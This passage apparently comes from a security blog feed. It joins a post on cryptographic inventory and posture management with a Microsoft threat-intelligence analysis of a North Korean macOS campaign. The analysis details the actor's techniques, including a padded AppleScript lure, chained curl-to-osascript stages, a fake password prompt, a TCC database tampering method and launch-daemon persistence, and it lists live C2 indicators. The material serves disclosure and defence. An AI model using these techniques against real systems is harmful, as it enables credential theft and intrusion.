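# Categories mirroring the inventory table above (illustrative identifiers).
CATEGORIES = {
    "certificates_and_keys",
    "protocols_and_cipher_suites",
    "cryptographic_libraries",
    "network_sessions",
    "secrets_and_credentials",
    "hsm",
}

@dataclass
class CryptoAsset:
    """One entry in a cryptographic inventory (hypothetical schema)."""
    category: str              # one of CATEGORIES
    name: str                  # e.g. a certificate CN or a library name
    algorithm: str             # e.g. "RSA", "AES-128", "SHA-1"
    key_bits: Optional[int]    # key length, where applicable
    location: str              # host, repo, vault, or network endpoint
    internet_facing: bool = False

    def __post_init__(self):
        # Reject records outside the agreed schema so the inventory
        # stays queryable with a consistent vocabulary.
        if self.category not in CATEGORIES:
            raise ValueError(f"unknown category: {self.category}")

# Example entries drawn from the categories above.
inventory = [
    CryptoAsset("certificates_and_keys", "api.example.com", "RSA", 2048,
                "web tier", internet_facing=True),
    CryptoAsset("cryptographic_libraries", "OpenSSL 1.0.2", "n/a", None,
                "legacy-app container"),
]
print(len(inventory))
```

The value of a schema like this is that every discovery tool's output lands in the same queryable shape, which is what later risk assessment and prioritization depend on.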
Why does this inventory matter? First, governance and compliance: 15 countries and the EU recommend or require some subset of organizations to do cryptographic inventorying. These are implemented through regulations like DORA, government policies like OMB M-23-02, and industry security standards like PCI DSS 4.0. We expect the number and scope of these policies to grow globally.
Second, risk prioritization: Cryptographic assets present varying levels of risk. For example, an internet-facing TLS endpoint using weak ciphers poses different threats compared to an internal test certificate, or local disk encryption utilizing the AES standard. Maintaining a comprehensive inventory enables effective assessment of exposure and facilitates the prioritization of remediation efforts, ensuring that risk-based decisions incorporate live telemetry and data sensitivity.
Third, it helps enable crypto agility: When a vulnerability is discovered in an encryption algorithm, an inventory can tell you exactly what needs updating and where.
Cryptography Posture Management (CPM) is not a single product, it’s an ongoing lifecycle that customers build and maintain using a combination of tools, integrations, and processes. Many organizations are building Quantum Safe Programs as a broader umbrella for cryptographic readiness. Whether or not you use that exact label, the technical foundation tends to look the same:
Define what you are managing (the inventory scope and critical assets).
Define how you make decisions (risk assessment and prioritization).
Define how you execute change safely (remediation and validation).
Define how you keep it current (continuous monitoring).
Diagram illustrating a customer-led CPM cycle with six stages: Discover, Normalize, Assess risk, Prioritize, Remediate, and Continuous monitoring, arranged in a circular flow with arrows indicating process direction.
This is where CPM is best understood as a lifecycle you run continuously:
Discover: Collect cryptographic signals from across your environment – code repositories, runtime environments, network traffic, and storage systems.
Normalize: Aggregate signals into a unified inventory with consistent data schema (certificate thumbprints, algorithm types, key lengths, and expiration dates).
Assess Risk: Evaluate cryptographic assets against policy baselines, industry standards, and known vulnerabilities. Identify weak algorithms, expired certificates, and non-compliant configurations.
Prioritize: Rank findings by risk based on asset criticality, exposure (internal vs. internet-facing), and compliance requirements.
Remediate: Rotate keys, update libraries, reconfigure protocols, and replace weak algorithms—using available automation and tooling.
Continuous Monitoring: Continuously track changes. New code commits, certificate renewals, configuration drift, and emerging vulnerabilities all require ongoing vigilance.
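The assess-and-prioritize steps above can be sketched as a simple scoring pass over normalized findings. The weights, the weak-algorithm list, and the field names below are illustrative assumptions; a real program would derive them from its own policy baselines and asset criticality data.

```python
# Illustrative list of algorithms a policy might flag as weak.
WEAK_ALGORITHMS = {"RSA-1024", "SHA-1", "3DES", "RC4"}

def risk_score(finding: dict) -> int:
    """Rank a finding by algorithm weakness, exposure, and criticality.
    Weights are arbitrary for illustration."""
    score = 0
    if finding["algorithm"] in WEAK_ALGORITHMS:
        score += 50
    if finding.get("internet_facing"):
        score += 30   # internet-facing exposure outranks internal issues
    if finding.get("business_critical"):
        score += 20
    return score

findings = [
    {"asset": "internal test cert", "algorithm": "SHA-1"},
    {"asset": "public TLS endpoint", "algorithm": "RSA-1024",
     "internet_facing": True, "business_critical": True},
    {"asset": "disk encryption", "algorithm": "AES-256"},
]
ranked = sorted(findings, key=risk_score, reverse=True)
print([f["asset"] for f in ranked])
```

Even a crude ranking like this surfaces the point made earlier: a weak cipher on an internet-facing endpoint is remediated before an internal test certificate, and strong local disk encryption needs no action at all.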
Diagram illustrating a customer-led CPM cycle with four phases: Preparation, Understanding, Planning & Execution, and Monitoring & Evaluation, arranged in a circular flow with arrows indicating process direction.
You can apply the lifecycle above across four domains: code, network, runtime, and storage:
Code: Cryptographic primitives and libraries in source code, detected through source code analysis.
Storage: Certificates, keys, and secrets stored on disk, in databases, in key vaults, or configuration files.
Network: Encrypted traffic sessions, TLS/SSH handshakes, cipher suite negotiations.
Runtime: In-memory usage of cryptographic libraries, active key material, process-level crypto operations.
A diagram outlining the steps of the CPM cycle, including risk assessment, planning, execution, normalization, prioritization, preparation, discovery, remediation, and continuous monitoring, with connections to the four components of code, storage, networks, and runtime.
Because the operating model spans multiple signal sources with no single owning team or platform, define clear ownership for each stage, with consistent inputs and measurable outputs. A "one-and-done" scan rarely holds up: the environment changes constantly, with new deployments, new libraries, renewed certificates, new endpoints, and new policies. The path that scales is an operating model, not a one-time project. By organizing your approach around these domains, you can systematically identify gaps, apply the right tools to each domain, and build a holistic view of your cryptographic posture.
Building your inventory with Microsoft tools
You don’t have to start from scratch. Many organizations already have Microsoft Security and Azure capabilities deployed that can generate cryptographic signals across code, endpoints, cloud workloads, and networks. The goal is to connect and normalize those signals into an inventory that supports risk-based decisions—then extend coverage with partner solutions where you need deeper visibility, automation, or multi-vendor reach:
Microsoft Tool | Cryptographic Signals | Domain Coverage | Public Documentation
GitHub Advanced Security (GHAS) | Identifies cryptographic algorithm artifacts in code via CodeQL | Code |
Microsoft Defender Vulnerability Management (MDVM) | Certificate inventory from devices with MDE agents, including asymmetric key algorithm details; detects cryptographic libraries and their vulnerabilities | Runtime, Storage |
Code Domain: Activate GitHub Advanced Security for your repositories. Use CodeQL queries to scan for cryptographic algorithm usage, and export results for central oversight.
Runtime and Storage Domain: Deploy Microsoft Defender for Endpoint and Defender Vulnerability Management across your endpoints. Use the certificate inventory feature to discover certificates and their associated algorithms. Review vulnerable cryptographic libraries flagged by MDVM.
Network Domain: Enable network protection in MDE to identify encrypted sessions. If you’re using Azure, configure Azure Network Watcher to capture traffic metadata and identify encrypted flows.
Storage Domain: Audit your Azure Key Vault instances to inventory secrets, keys, and certificates. Use Defender for Cloud secret scanning to detect exposed keys in IaaS and PaaS resources.
Normalize & Centralize: Bring outputs together in a common view and schema for tracking (for example, in a security data platform or SIEM such as Microsoft Sentinel). Many teams start with supported exports/connectors and existing reporting workflows—then mature toward automation and governed data pipelines as the program scales. The goal is a single, queryable inventory that teams can operate.
Assess & Prioritize: Define your cryptographic policy baselines (e.g., minimum key lengths, approved algorithms, certificate expiration thresholds). Compare your inventory against these baselines and prioritize based on risk.
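Comparing a centralized inventory against such baselines can be as mechanical as the sketch below. The baseline values, entry format, and function name are hypothetical; substitute your organization's approved algorithms and minimum key lengths.

```python
from typing import List

# Hypothetical policy baseline -- real values come from your own standards.
BASELINE = {
    "approved_algorithms": {"RSA", "ECDSA", "AES"},
    "min_key_bits": {"RSA": 2048, "ECDSA": 256, "AES": 128},
}

def check_against_baseline(asset: dict) -> List[str]:
    """Return the policy violations for one inventory entry."""
    issues = []
    alg, bits = asset["algorithm"], asset.get("key_bits")
    if alg not in BASELINE["approved_algorithms"]:
        issues.append(f"{asset['name']}: algorithm {alg} not approved")
    elif bits is not None and bits < BASELINE["min_key_bits"][alg]:
        issues.append(f"{asset['name']}: {alg}-{bits} below minimum "
                      f"{BASELINE['min_key_bits'][alg]} bits")
    return issues

assets = [
    {"name": "legacy-vpn", "algorithm": "RSA", "key_bits": 1024},
    {"name": "api-gateway", "algorithm": "ECDSA", "key_bits": 256},
    {"name": "old-hash", "algorithm": "MD5", "key_bits": None},
]
violations = [v for a in assets for v in check_against_baseline(a)]
print(violations)
```

Run continuously against a refreshed inventory, a check like this turns a static policy document into the drift detection the lifecycle's monitoring stage calls for.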
This approach leverages tools many organizations already have deployed, providing a pragmatic starting point without requiring significant new investment.
Accelerating your journey with the partner ecosystem
As organizations progress from initial cryptographic inventory to ongoing posture management, Microsoft partners with leading CPM providers to deliver comprehensive solutions that address complex environments across code, infrastructure, devices, applications, and both cloud and on-premises systems. These integrated CPM solutions—running on Azure and deeply connected with the Microsoft Security platform—enable holistic inventory, visibility, and risk assessment by collecting cryptographic signals from Microsoft and non-Microsoft sources, supporting industries with stringent regulatory demands and complex legacy estates, and providing unified management, guided remediation, and quantum security readiness at scale.
Microsoft partners such as Keyfactor, Forescout, Entrust, and Isara, have CPM solutions available today. Each partner delivers unique capabilities spanning certificate and key lifecycle management, network visibility, software supply chain, and code analysis. Together, this growing ecosystem gives customers the flexibility to adopt CPM solutions integrated with the Microsoft Security platform that support a broad range of customer scenarios and align to your architecture, risk profile, and operational maturity.
Keyfactor: Keyfactor AgileSec discovers, then continuously monitors, all instances of your cryptography, known and unknown, to understand where and how they are used across the organization. Assets are then processed to flag vulnerabilities to enable teams to efficiently remediate risks with advanced integration workflows, providing the base for crypto-agility and quantum readiness.
Forescout: The Forescout Cyber Assurance solution on Azure lets a customer determine the real-time network risk of an enterprise asset, including its use of PQC and non-PQC communications, matrixed by thousands of other attributes including application, protocol, country, geography, risk, and posture across IT, IoT, and OT environments.
Entrust: The Entrust Cryptographic Security Platform delivers visibility, automation, and control across PKI, key and certificate lifecycle management, and HSMs within a scalable architecture built for crypto-agility and post-quantum readiness.
Isara: ISARA Advance™ is a crypto posture management solution for enterprises and agencies. Deployed on Microsoft Azure, Advance automates discovery and inventory, quantifies risk, prioritizes, and remediates. Within hours of deployment, it discovers cryptographic threats from outdated protocols and weaknesses in key strengths and algorithms, prioritizes them, and enables remediation of cryptography and configuration changes across servers, apps, databases, and source code components.
Getting started: a customer checklist
Ready to begin building your cryptographic inventory? Here’s a practical checklist to get started:
Establish ownership: Assign clear accountability for cryptographic governance. This often spans security, infrastructure, and development teams. It ensures someone owns the overall inventory and posture.
Start inventory collection: Use the starter playbook above or a Microsoft Partner to begin collecting signals from code, runtime, network, and storage domains using Microsoft tools you already have.
Define crypto policy baselines: Document your organization’s cryptographic standards (approved algorithms, minimum key lengths, certificate validity periods, protocol versions). Align with industry standards and compliance requirements.
Prioritize exposures: Not all findings are equal. Prioritize based on asset criticality, exposure (internet-facing vs. internal), and compliance mandates.
Plan remediation: Identify remediation approaches for high-priority findings—library updates, certificate rotations, protocol reconfigurations. Build runbooks and automation where possible.
Leverage partners to accelerate: If you need broader coverage, faster deployment, or specialized capabilities, explore the partner ecosystem on Azure Marketplace to find solutions that integrate with your Microsoft security investments and accelerate your efforts.
Cryptographic posture management is a journey, not a destination. As standards evolve, new vulnerabilities emerge, and quantum computing advances, your inventory and operating model will need to adapt. But by starting now, with the tools you have, the partners who can help, and a clear operating model, you'll be well-positioned not only for the quantum era but for sound cryptographic hygiene in the years ahead.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
Microsoft Threat Intelligence uncovered a macOS‑focused cyber campaign by the North Korean threat actor Sapphire Sleet that relies on social engineering rather than software vulnerabilities. By impersonating a legitimate software update, threat actors tricked users into manually running malicious files, allowing them to steal passwords, cryptocurrency assets, and personal data while avoiding built‑in macOS security checks. This activity highlights how convincing user prompts and trusted system tools can be abused, and why awareness and layered security defenses remain critical.
Microsoft Threat Intelligence identified a campaign by North Korean state actor Sapphire Sleet demonstrating new combinations of macOS-focused execution patterns and techniques, enabling the threat actor to compromise systems through social engineering rather than software exploitation. In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries. While the techniques themselves are not novel, this analysis highlights execution patterns and combinations that Microsoft has not previously observed for this threat actor, including how Sapphire Sleet orchestrates these techniques together and uses AppleScript as a dedicated, late‑stage credential‑harvesting component integrated with decoy update workflows.
After discovering the threat, Microsoft shared details of this activity with Apple as part of our responsible disclosure process. Apple has since implemented updates to help detect and block infrastructure and malware associated with this campaign. We thank the Apple security team for their collaboration in addressing this activity and encourage macOS users to keep their devices up to date with the latest security protections.
This activity demonstrates how threat actors continue to rely on user interaction and trusted system utilities to bypass macOS platform security protections, rather than exploiting traditional software vulnerabilities. By persuading users to manually execute AppleScript or Terminal‑based commands, Sapphire Sleet shifts execution into a user‑initiated context, allowing the activity to proceed outside of macOS protections such as Transparency, Consent, and Control (TCC), Gatekeeper, quarantine enforcement, and notarization checks. Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise—posing an elevated risk to organizations and individuals involved in cryptocurrency, digital assets, finance, and similar high‑value targets that Sapphire Sleet is known to target.
In this blog, we examine the macOS‑specific attack chain observed in recent Sapphire Sleet intrusions, from initial access using malicious .scpt files through multi-stage payload delivery, credential harvesting using fake system dialogs, manipulation of the macOS TCC database, persistence using launch daemons, and large-scale data exfiltration. We also provide actionable guidance, Microsoft Defender detections, hunting queries, and indicators of compromise (IOCs) to help defenders identify similar threats and strengthen macOS security posture.
Sapphire Sleet’s campaign lifecycle
Initial access and social engineering
Sapphire Sleet is a North Korean state actor active since at least March 2020 that primarily targets the finance sector, including cryptocurrency, venture capital, and blockchain organizations. The primary motivations of this actor are to steal cryptocurrency wallets to generate revenue and to target technology or intellectual property related to cryptocurrency trading and blockchain platforms.
Recent campaigns demonstrate expanded execution mechanisms across operating systems like macOS, enabling Sapphire Sleet to target a broader set of users through parallel social engineering workflows.
Sapphire Sleet operates a well‑documented social engineering playbook in which the threat actor creates fake recruiter profiles on social media and professional networking platforms, engages targets in conversations about job opportunities, schedules a technical interview, and directs targets to install malicious software, which is typically disguised as a video conferencing tool or software developer kit (SDK) update.
In this observed activity, the target was directed to download a file called Zoom SDK Update.scpt—a compiled AppleScript that opens in macOS Script Editor by default. Script Editor is a trusted first-party Apple application capable of executing arbitrary shell commands using the do shell script AppleScript command.
Lure file and Script Editor execution
Figure 1. Initial access: The .scpt lure file as seen in macOS Script Editor
The malicious Zoom SDK Update.scpt file is crafted to appear as a legitimate Zoom SDK update when opened in the macOS Script Editor app, beginning with a large decoy comment block that mimics benign upgrade instructions and gives the impression of a routine software update. To conceal its true behavior, the script inserts thousands of blank lines immediately after this visible content, pushing the malicious logic far below the scrollable view of the Script Editor window and reducing the likelihood that a user will notice it.
Hidden beneath this decoy, the script first launches a harmless-looking command that invokes the legitimate macOS softwareupdate binary with an invalid parameter, an action that performs no real update but launches a trusted Apple-signed process to reinforce the appearance of legitimacy. Following this, the script executes its malicious payload by using curl to retrieve threat actor-controlled content and immediately passing the returned data to osascript for execution using the run script result instruction. Because the content fetched by curl is itself a new AppleScript, it is launched directly within the Script Editor context, initiating a payload delivery chain in which additional stages are dynamically downloaded and executed.
Figure 2. The AppleScript lure with decoy content and payload execution
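The blank-line padding trick described above is straightforward to screen for. The Python sketch below flags script files in which content reappears after a long run of blank lines, the pattern used to push malicious logic below the Script Editor's scrollable view. The 500-line threshold and the synthetic lure text are assumptions for illustration, not values taken from the campaign.

```python
def has_suspicious_padding(script_text: str, threshold: int = 500) -> bool:
    """Flag scripts that hide logic below a long run of blank lines,
    as in the Zoom SDK Update.scpt lure. Threshold is an assumption."""
    run = 0
    for line in script_text.splitlines():
        if line.strip() == "":
            run += 1
        else:
            # Non-blank content reappearing after a huge blank gap
            # is the red flag; an honest script ends after trailing blanks.
            if run >= threshold:
                return True
            run = 0
    return False

# Synthetic lure: visible decoy comment, thousands of blank lines,
# then the hidden payload logic (URL is a documentation-range address).
lure = ("-- Zoom SDK upgrade instructions\n" + "\n" * 3000 +
        'do shell script "curl http://198.51.100.1/x | osascript"\n')
print(has_suspicious_padding(lure))
```

A scanner like this is cheap enough to run over any `.scpt` or shell file delivered through an interview-themed download before a user ever opens it.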
Execution and payload delivery
Cascading curl-to-osascript execution
When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain. From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.
Figure 3. Process tree showing cascading execution from Script Editor
The main payload fetched by the mac-cur1 user agent is the attack orchestrator. Once executed within the Script Editor, it performs immediate reconnaissance, then kicks off parallel operations using additional curl commands with different user-agent strings.
Note the URL path difference: mac-cur1 through mac-cur3 fetch from /version/ (AppleScript payloads piped directly to osascript for execution), while mac-cur4 and mac-cur5 fetch from /status/ (ZIP archives containing compiled macOS .app bundles).
The following table summarizes the curl chain used in this campaign.
User agent | URL path | Purpose
mac-cur1 | /fix/mac/update/version/ | Main orchestrator (piped to osascript) and beacon; downloads the com.apple.cli host monitoring component and the services backdoor
mac-cur2 | /fix/mac/update/version/ | Invokes curl with mac-cur4, which downloads the credential harvester systemupdate.app
mac-cur3 | /fix/mac/update/version/ | TCC bypass + data collection + exfiltration (wallets, browser data, keychains, history, Apple Notes, Telegram)
Figure 4. The curl chain showing user-agent strings and payload routing
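The cascading curl-to-osascript pattern is itself a useful hunting signal. The sketch below scans process command lines for curl output piped into osascript, or for the `mac-cur` user-agent prefix described above. The sample command lines are synthetic (the IP is from the documentation range), and the heuristics are illustrative rather than production detection logic.

```python
import re

# Heuristics for the execution pattern described above (illustrative).
PIPE_PATTERN = re.compile(r"curl\b.*\|\s*osascript\b")
UA_PATTERN = re.compile(r"-A\s+['\"]?mac-cur\d")

def is_suspicious_cmdline(cmdline: str) -> bool:
    """Flag curl output piped to osascript, or the campaign's
    mac-curN user-agent strings."""
    return bool(PIPE_PATTERN.search(cmdline) or UA_PATTERN.search(cmdline))

# Synthetic process list: one malicious chain, two benign commands.
process_list = [
    "curl -s -A 'mac-cur2' http://198.51.100.1/fix/mac/update/version/ | osascript",
    "curl -fsSL https://example.com/install.sh -o install.sh",
    "/usr/bin/osascript /Users/dev/backup.scpt",
]
hits = [c for c in process_list if is_suspicious_cmdline(c)]
print(len(hits))
```

Note that curl downloading to a file, or osascript running a local script, is each unremarkable on its own; it is the combination, piping remote content straight into osascript, that warrants investigation.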
Reconnaissance and C2 registration
After execution, the malware next identifies and registers the compromised device with Sapphire Sleet infrastructure. The malware starts by collecting basic system details such as the current user, host name, system time, and operating system install date. This information is used to uniquely identify the compromised device and track subsequent activity.
The malware then registers the compromised system with its command‑and‑control (C2) infrastructure. The mid value represents the device’s universally unique identifier (UUID), the did serves as a campaign‑level tracking identifier, and the user field combines the system host name with the device serial number to uniquely label the targeted user.
Figure 5. C2 registration with device UUID and campaign identifier
Host monitoring component: com.apple.cli
The first binary deployed is a host monitoring component called com.apple.cli—a ~5 MB Mach-O binary disguised with an Apple-style naming convention.
The mac-cur1 payload spawns an osascript that downloads and launches com.apple.cli:
Figure 6. com.apple.cli deployment using osascript
The host monitoring component repeatedly executes a series of system commands to collect environment and runtime information, including the macOS version (sw_vers), the current system time (date -u), and the underlying hardware model (sysctl hw.model). It then runs ps aux in a tight loop to capture a full, real‑time list of running processes.
During execution, com.apple.cli performs host reconnaissance while maintaining repeated outbound connectivity to the threat actor-controlled C2 endpoint 83.136.208[.]246:6783. The observed sequencing of reconnaissance activity and network communication is consistent with staging for later operational activity, including privilege escalation and exfiltration.
In parallel with deploying com.apple.cli, the mac-cur1 orchestrator also deploys a second component, the services backdoor, as part of the same execution flow; its role in persistence and follow‑on activity is described later in this blog.
Credential access
Credential harvester: systemupdate.app
After performing reconnaissance, the mac-cur1 orchestrator begins parallel operations. During the mac‑cur2 stage of execution (independent from the mac-cur1 stage), Sapphire Sleet delivers an AppleScript payload that is executed through osascript. This stage is responsible for deploying the credential harvesting component of the attack.
Before proceeding, the script checks for the presence of a file named .zoom.log on the system. This file acts as an infection marker, allowing Sapphire Sleet to determine whether the device has already been compromised. If the marker exists, deployment is skipped to avoid redundant execution across sessions.
If the infection marker is not found, the script downloads a compressed archive through the mac-cur4 user agent that contains a malicious macOS application named systemupdate.app, which masquerades as the legitimate system update utility of the same name. The archive is extracted to a temporary location, and the application is launched immediately.
When systemupdate.app launches, the user is presented with a native macOS password dialog that is visually indistinguishable from a legitimate system prompt. The dialog claims that the user’s password is required to complete a software update, prompting the user to enter their credentials.
After the user enters their password, the malware performs two sequential actions to ensure the credential is usable and immediately captured. First, the binary validates the entered password against the local macOS authentication database using directory services, confirming that the credential is correct and not mistyped. Once validation succeeds, the verified password is immediately exfiltrated to threat actor‑controlled infrastructure using the Telegram Bot API, delivering the stolen credential directly to Sapphire Sleet.
Figure 7. Password popup given by fake systemupdate.app
Decoy completion prompt: softwareupdate.app
After credential harvesting is completed using systemupdate.app, Sapphire Sleet deploys a second malicious application named softwareupdate.app, whose sole purpose is to reinforce the illusion of a legitimate update workflow. This application is delivered during a later stage of the attack using the mac‑cur5 user‑agent. Unlike systemupdate.app, softwareupdate.app does not attempt to collect credentials. Instead, it displays a convincing “system update complete” dialog to the user, signaling that the supposed Zoom SDK update has finished successfully. This final step closes the social engineering loop: the user initiated a Zoom‑themed update, was prompted to enter their password, and is now reassured that the process completed as expected, reducing the likelihood of suspicion or further investigation.
Persistence
Primary backdoor and persistence installer: services binary
The services backdoor is a key operational component in this attack, acting as the primary backdoor and persistence installer. It provides an interactive command execution channel, establishes persistence using a launch daemon, and deploys two additional backdoors. The services backdoor is deployed through a dedicated AppleScript executed as part of the initial mac‑cur1 payload that also deployed com.apple.cli, although the additional backdoors deployed by services are executed at a later stage.
During deployment, the services backdoor binary is first downloaded using a hidden file name (.services) to reduce visibility, then copied to its final location before the temporary file is removed. As part of installation, the malware creates a file named auth.db under ~/Library/Application Support/Authorization/, which stores the path to the deployed services backdoor and serves as a persistent installation marker. Any execution or runtime errors encountered during this process are written to /tmp/lg4err, leaving behind an additional forensic artifact that can aid post‑compromise investigation.
Figure 8. Services backdoor deployment using osascript
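The installer's on-disk artifacts offer a straightforward hunting opportunity. The following sketch, in the same advanced hunting style as the queries later in this post, looks for the hidden .services download, the auth.db installation marker, and the lg4err error log described above. Note that auth.db is a generic file name, so the path filter reduces noise; tune the names and paths to your environment.

```kusto
// Hunt for on-disk artifacts of the services backdoor installer:
// the hidden .services download, the auth.db installation marker
// under ~/Library/Application Support/Authorization/, and the
// /tmp/lg4err error log.
DeviceFileEvents
| where Timestamp > ago(30d)
| where FileName in (".services", "lg4err")
    or (FileName == "auth.db" and FolderPath has "Application Support/Authorization")
| project Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
```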
Unlike com.apple.cli, the services backdoor uses interactive zsh shells (/bin/zsh -i) to execute privileged operations. The -i flag creates an interactive terminal context, which is required for sudo commands that expect interactive input.
Figure 9. Interactive zsh shell execution by the services backdoor
Additional backdoors: icloudz and com.google.chromes.updaters
Of the additional backdoors deployed by services, the icloudz backdoor is a renamed copy of the previously deployed services backdoor and shares the same SHA‑256 hash, indicating identical underlying code. Despite sharing the same binary, icloudz is executed using a more evasive technique: it operates as a reflective code loader, using the macOS NSCreateObjectFileImageFromMemory API to load additional payloads received from its C2 infrastructure directly into memory, rather than writing them to disk and executing them conventionally.
The icloudz backdoor is stored at ~/Library/Application Support/iCloud/icloudz, a location and naming choice intended to resemble legitimate iCloud‑related artifacts. Once loaded into memory, two distinct execution waves are observed. Each wave independently initializes a consistent sequence of system commands: existing caffeinate processes are stopped, caffeinate is relaunched using nohup to prevent the system from sleeping, basic system information is collected using sw_vers and sysctl -n hw.model, and an interactive /bin/zsh -i shell is spawned. This repeated initialization suggests that the component is designed to re‑establish execution context reliably across runs.
From within the interactive zsh shell, icloudz deploys an additional (tertiary) backdoor, com.google.chromes.updaters, to disk at ~/Library/Google/com.google.chromes.updaters. The selected directory and file name closely resemble legitimate Google application data, helping the file blend into the user’s Home directory and reducing the likelihood of casual inspection. File permissions and ownership are adjusted to allow execution with elevated privileges, and the com.google.chromes.updaters binary is launched using sudo.
To ensure continued execution across reboots, a launch daemon configuration file named com.google.webkit.service.plist is installed under /Library/LaunchDaemons. This configuration causes icloudz to launch automatically at system startup, even if no user is signed in. The naming convention deliberately mimics legitimate Apple and Google system services, further reducing the chance of detection.
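Based on the behavior described above, the persistence mechanism is an ordinary launchd daemon definition. The following plist is an illustrative reconstruction, not a recovered sample: the Label and program path come from this report, while the remaining keys are assumptions based on standard launchd persistence.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <!-- Label deliberately mimics Apple/Google service naming -->
    <key>Label</key>
    <string>com.google.webkit.service</string>
    <!-- Points at the icloudz backdoor described above;
         USERNAME is a placeholder -->
    <key>ProgramArguments</key>
    <array>
        <string>/Users/USERNAME/Library/Application Support/iCloud/icloudz</string>
    </array>
    <!-- RunAtLoad launches the daemon at system startup,
         before any user signs in (assumed key) -->
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
```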
The com.google.chromes.updaters backdoor is the final and largest component deployed in this attack chain, with a size of approximately 7.2 MB. Once running, it establishes outbound communication with threat actor‑controlled infrastructure, connecting to the domain check02id[.]com over port 5202. The process then enters a precise 60‑second beaconing loop. During each cycle, it executes minimal commands such as whoami to confirm the execution context and sw_vers -productVersion to report the operating system version. This lightweight heartbeat confirms the process remains active, is running with elevated privileges, and is ready to receive further instructions.
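The fixed 60-second cadence is itself a detection opportunity. The following sketch estimates the average interval between connections per host and process (Microsoft Defender XDR schema); the beacon-count and interval thresholds are illustrative and should be tuned for your environment.

```kusto
// Surface hosts beaconing on a roughly 60-second cadence to the
// com.google.chromes.updaters C2 domain or its port 5202.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "check02id.com" or RemotePort == 5202
| summarize Beacons = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp)
    by DeviceId, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
| extend AvgIntervalSeconds = iff(Beacons > 1, datetime_diff("second", LastSeen, FirstSeen) / (Beacons - 1), 0)
| where Beacons > 10 and AvgIntervalSeconds between (45 .. 75)
```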
Privilege escalation
TCC bypass: Granting AppleEvents permissions
Before large‑scale data access and exfiltration can proceed, Sapphire Sleet must bypass macOS TCC protections. TCC enforces user consent for sensitive inter‑process interactions, including AppleEvents, the mechanism required for osascript to communicate with Finder and perform file-level operations. The mac-cur3 stage silently grants itself these permissions by directly manipulating the user-level TCC database through the following sequence.
The user-level TCC database (~/Library/Application Support/com.apple.TCC/TCC.db) is itself TCC-protected—processes without Full Disk Access (FDA) cannot read or modify it. Sapphire Sleet circumvents this by directing Finder, which holds FDA by default on macOS, to rename the com.apple.TCC folder. Once renamed, the TCC database file can be copied to a staging location by a process without FDA.
Sapphire Sleet then uses sqlite3 to inject a new entry into the database’s access table. This entry grants /usr/bin/osascript permission to send AppleEvents to com.apple.finder and includes valid code-signing requirement (csreq) blobs for both binaries, binding the grant to Apple-signed executables. The authorization value is set to allowed (auth_value=2) with a user-set reason (auth_reason=3), ensuring no user prompt is triggered. The modified database is then copied back into the renamed folder, and Finder restores the folder to its original name. Staging files are deleted to reduce forensic traces.
Figure 10. Overwriting original TCC database with modified version
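In addition to the file-event query provided later in this post, defenders can hunt for sqlite3 processes whose command line references the TCC database. This is a sketch rather than a tuned detection; kTCCServiceAppleEvents is the standard TCC service identifier for AppleEvents permissions, and legitimate software rarely drives sqlite3 against TCC.db directly.

```kusto
// Hunt for sqlite3 writing to a (staged copy of the) TCC database,
// matching the injection of an AppleEvents grant described above.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "sqlite3" or ProcessCommandLine has "sqlite3"
| where ProcessCommandLine has "TCC.db"
| where ProcessCommandLine has_any ("INSERT", "REPLACE", "UPDATE", "kTCCServiceAppleEvents")
| project Timestamp, DeviceId, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
```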
Collection and exfiltration
With TCC bypassed, credentials stolen, and backdoors deployed, Sapphire Sleet launches the next phase of the attack: a 575-line AppleScript payload that systematically collects, stages, compresses, and exfiltrates seven categories of data.
Exfiltration architecture
Every upload follows a consistent pattern and is executed using nohup, which allows the command to continue running in the background even if the initiating process or Terminal session exits. This ensures that data exfiltration can complete reliably without requiring the threat actor to maintain an active session on the system.
The auth header provides the upload authorization token, and the mid header ties the upload to the compromised device’s UUID.
Figure 11. Exfiltration upload pattern with nohup
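The upload pattern in figure 11 can also be approximated in advanced hunting. The header tokens below (auth:, mid:) and the port are inferred from the pattern described above, so treat this as a starting point rather than a precise signature.

```kusto
// Hunt for the nohup + curl upload pattern: background curl
// invocations carrying the campaign's auth and mid headers
// or targeting the port 8443 upload endpoint.
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has "curl"
| where ProcessCommandLine has "nohup" or InitiatingProcessCommandLine has "nohup"
| where ProcessCommandLine has_any ("auth:", "mid:", ":8443")
| project Timestamp, DeviceId, DeviceName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
```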
Data collected during exfiltration
Host and system reconnaissance: Before bulk data collection begins, the script records basic system identity and hardware information. This includes the current username, system host name, macOS version, and CPU model. These values are appended to a per‑host log file and provide Sapphire Sleet with environmental context, hardware fingerprinting, and confirmation of the target system’s characteristics. This reconnaissance data is later uploaded to track progress and correlate subsequent exfiltration stages to a specific device.
Installed applications and runtime verification: The script enumerates installed applications and shared directories to build an inventory of the system’s software environment. It also captures a live process listing filtered for threat actor‑deployed components, allowing Sapphire Sleet to verify that earlier payloads are still running as expected. These checks help confirm successful execution and persistence before proceeding further.
